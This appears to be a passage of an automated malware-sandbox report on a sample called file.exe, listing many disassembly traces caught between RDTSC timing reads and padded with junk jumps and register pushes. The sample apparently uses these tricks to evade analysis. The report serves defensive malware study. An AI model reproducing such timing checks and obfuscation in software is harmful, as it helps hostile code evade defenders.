                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0736 second address: 49F083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c pushad 0x0000000d jmp 00007FCBA4817E89h 0x00000012 popad 0x00000013 mov eax, dword ptr [ebx+0000008Ch] 0x00000019 jmp 00007FCBA4817E7Eh 0x0000001e mov dword ptr [esi+34h], eax 0x00000021 jmp 00007FCBA4817E80h 0x00000026 mov eax, dword ptr [ebx+18h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBA4817E7Eh 0x00000030 and si, 8348h 0x00000035 jmp 00007FCBA4817E7Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FCBA4817E88h 0x00000041 jmp 00007FCBA4817E85h 0x00000046 popfd 0x00000047 popad 0x00000048 mov dword ptr [esi+38h], eax 0x0000004b pushad 0x0000004c pushad 0x0000004d mov edi, ecx 0x0000004f pushfd 0x00000050 jmp 00007FCBA4817E86h 0x00000055 or ax, 3338h 0x0000005a jmp 00007FCBA4817E7Bh 0x0000005f popfd 0x00000060 popad 0x00000061 pushad 0x00000062 mov si, D705h 0x00000066 jmp 00007FCBA4817E82h 0x0000006b popad 0x0000006c popad 0x0000006d mov eax, dword ptr [ebx+1Ch] 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FCBA4817E87h 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F083D second address: 49F0852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+3Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0852 second address: 49F08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA4817E87h 0x00000008 pushfd 0x00000009 jmp 00007FCBA4817E88h 0x0000000e jmp 00007FCBA4817E85h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+20h] 0x0000001a pushad 0x0000001b mov eax, 37EDEE83h 0x00000020 pushfd 0x00000021 jmp 00007FCBA4817E88h 0x00000026 and si, D648h 0x0000002b jmp 00007FCBA4817E7Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esi+40h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FCBA4817E85h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F08EC second address: 49F0956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FCBA46BC743h 0x0000000b sub cx, 8DEEh 0x00000010 jmp 00007FCBA46BC749h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebx+00000080h] 0x0000001f jmp 00007FCBA46BC73Eh 0x00000024 push 00000001h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FCBA46BC747h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0956 second address: 49F095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F095C second address: 49F0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0960 second address: 49F09CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E7Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FCBA4817E88h 0x0000001b and esi, 199B4558h 0x00000021 jmp 00007FCBA4817E7Bh 0x00000026 popfd 0x00000027 mov ebx, esi 0x00000029 popad 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e jmp 00007FCBA4817E82h 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov si, bx 0x0000003a mov dh, 86h 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F09CA second address: 49F09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F09D0 second address: 49F09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E7Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A65 second address: 49F0A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0A6B second address: 49F0AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA4817E7Ch 0x00000009 sub ecx, 2867D398h 0x0000000f jmp 00007FCBA4817E7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edi, edi 0x0000001a pushad 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e js 00007FCC16FE6AA3h 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edx 0x00000027 mov di, si 0x0000002a popad 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FCBA4817E86h 0x00000035 adc eax, 6766D858h 0x0000003b jmp 00007FCBA4817E7Bh 0x00000040 popfd 0x00000041 mov ah, 59h 0x00000043 popad 0x00000044 mov dword ptr [esi+04h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBA4817E7Eh 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0AE6 second address: 49F0B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d mov al, E7h 0x0000000f mov bx, BC94h 0x00000013 popad 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov al, A8h 0x0000001b pushfd 0x0000001c jmp 00007FCBA46BC741h 0x00000021 or ax, 6006h 0x00000026 jmp 00007FCBA46BC741h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B31 second address: 49F0BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA4817E87h 0x00000009 xor ecx, 50AA2F3Eh 0x0000000f jmp 00007FCBA4817E89h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FCBA4817E80h 0x0000001b or ax, 6C38h 0x00000020 jmp 00007FCBA4817E7Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FCBA4817E7Bh 0x00000033 and si, 49FEh 0x00000038 jmp 00007FCBA4817E89h 0x0000003d popfd 0x0000003e mov dx, si 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0BC4 second address: 49F0BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 9F5Eh 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA46BC747h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0BEB second address: 49F0C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E88h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C25 second address: 49F0C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C29 second address: 49F0C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0CE4 second address: 49F0D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e movzx ecx, bx 0x00000011 mov dx, 461Ah 0x00000015 popad 0x00000016 mov bx, A9E6h 0x0000001a popad 0x0000001b mov dword ptr [esi+08h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FCBA46BC746h 0x00000027 jmp 00007FCBA46BC745h 0x0000002c popfd 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D41 second address: 49F0D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D47 second address: 49F0D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f call 00007FCBA46BC744h 0x00000014 pop edx 0x00000015 mov bh, ch 0x00000017 popad 0x00000018 push 00000001h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d movsx ebx, ax 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D80 second address: 49F0D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D87 second address: 49F0DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA46BC741h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DA1 second address: 49F0DD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA4817E81h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCBA4817E7Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DD8 second address: 49F0DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DDE second address: 49F0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DE2 second address: 49F0DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, 2F57h 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DF7 second address: 49F0E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E0F second address: 49F0E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E13 second address: 49F0E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E22 second address: 49F0E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E26 second address: 49F0E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E3F second address: 49F0E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E45 second address: 49F0E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E67 second address: 49F0E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E6B second address: 49F0E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0EE3 second address: 49F0EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0EE9 second address: 49F0EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0EED second address: 49F0F2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e movzx eax, di 0x00000011 jmp 00007FCBA46BC741h 0x00000016 popad 0x00000017 js 00007FCC16E8AECFh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCBA46BC73Dh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0F2B second address: 49F0F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0F31 second address: 49F0F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA46BC745h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0F64 second address: 49F1025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c jmp 00007FCBA4817E7Ch 0x00000011 push esi 0x00000012 pushfd 0x00000013 jmp 00007FCBA4817E81h 0x00000018 sbb ecx, 107C2946h 0x0000001e jmp 00007FCBA4817E81h 0x00000023 popfd 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esi+0Ch], eax 0x00000029 jmp 00007FCBA4817E87h 0x0000002e mov edx, 772406ECh 0x00000033 pushad 0x00000034 mov ax, A4FBh 0x00000038 pushfd 0x00000039 jmp 00007FCBA4817E80h 0x0000003e add eax, 7476C848h 0x00000044 jmp 00007FCBA4817E7Bh 0x00000049 popfd 0x0000004a popad 0x0000004b sub eax, eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov di, cx 0x00000053 pushfd 0x00000054 jmp 00007FCBA4817E7Ch 0x00000059 sbb ecx, 709C0AA8h 0x0000005f jmp 00007FCBA4817E7Bh 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1025 second address: 49F1048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 jmp 00007FCBA46BC740h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lock cmpxchg dword ptr [edx], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1048 second address: 49F104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F104C second address: 49F1050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1050 second address: 49F1056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1056 second address: 49F10C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007FCBA46BC740h 0x0000000f test eax, eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FCBA46BC743h 0x00000019 add si, 4B5Eh 0x0000001e jmp 00007FCBA46BC749h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 jne 00007FCC16E8AD5Ah 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F10C4 second address: 49F10C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F10C8 second address: 49F10DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F120E second address: 49F126B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007FCBA4817E7Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007FCBA4817E80h 0x00000019 mov dword ptr [edx+10h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCBA4817E87h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F126B second address: 49F1321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c jmp 00007FCBA46BC73Eh 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 movzx eax, bx 0x00000018 pushfd 0x00000019 jmp 00007FCBA46BC743h 0x0000001e adc ax, A69Eh 0x00000023 jmp 00007FCBA46BC749h 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+18h] 0x0000002d pushad 0x0000002e mov cx, 7603h 0x00000032 pushfd 0x00000033 jmp 00007FCBA46BC748h 0x00000038 adc cx, 97C8h 0x0000003d jmp 00007FCBA46BC73Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [edx+18h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBA46BC745h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1321 second address: 49F1331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E7Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1331 second address: 49F136D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b jmp 00007FCBA46BC747h 0x00000010 mov dword ptr [edx+1Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCBA46BC745h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F136D second address: 49F1394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E7Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1394 second address: 49F13F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FCBA46BC743h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FCBA46BC749h 0x0000001b sub ah, FFFFFFC6h 0x0000001e jmp 00007FCBA46BC741h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F13F3 second address: 49F1435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FCBA4817E83h 0x0000000b adc ah, FFFFFFFEh 0x0000000e jmp 00007FCBA4817E89h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+24h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1435 second address: 49F1439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1439 second address: 49F143F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F143F second address: 49F1445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1445 second address: 49F1449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1449 second address: 49F1477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e jmp 00007FCBA46BC740h 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1477 second address: 49F1494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1494 second address: 49F1588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 mov eax, edi 0x00000012 popad 0x00000013 mov ecx, dword ptr [esi+2Ch] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA46BC741h 0x0000001d xor cx, B806h 0x00000022 jmp 00007FCBA46BC741h 0x00000027 popfd 0x00000028 jmp 00007FCBA46BC740h 0x0000002d popad 0x0000002e mov dword ptr [edx+2Ch], ecx 0x00000031 jmp 00007FCBA46BC740h 0x00000036 mov ax, word ptr [esi+30h] 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FCBA46BC73Eh 0x00000041 add cx, 4908h 0x00000046 jmp 00007FCBA46BC73Bh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FCBA46BC748h 0x00000052 jmp 00007FCBA46BC745h 0x00000057 popfd 0x00000058 popad 0x00000059 mov word ptr [edx+30h], ax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov ax, di 0x00000063 pushfd 0x00000064 jmp 00007FCBA46BC73Fh 0x00000069 jmp 00007FCBA46BC743h 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1588 second address: 49F15E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d jmp 00007FCBA4817E7Eh 0x00000012 mov word ptr [edx+32h], ax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA4817E7Eh 0x0000001d sub cx, 0DB8h 0x00000022 jmp 00007FCBA4817E7Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a mov di, si 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F15E1 second address: 49F162F instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007FCBA46BC73Ch 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FCBA46BC73Dh 0x0000001a or al, 00000006h 0x0000001d jmp 00007FCBA46BC741h 0x00000022 popfd 0x00000023 popad 0x00000024 test ecx, 00000700h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, 89h 0x0000002f mov di, cx 0x00000032 popad 0x00000033 rdtsc
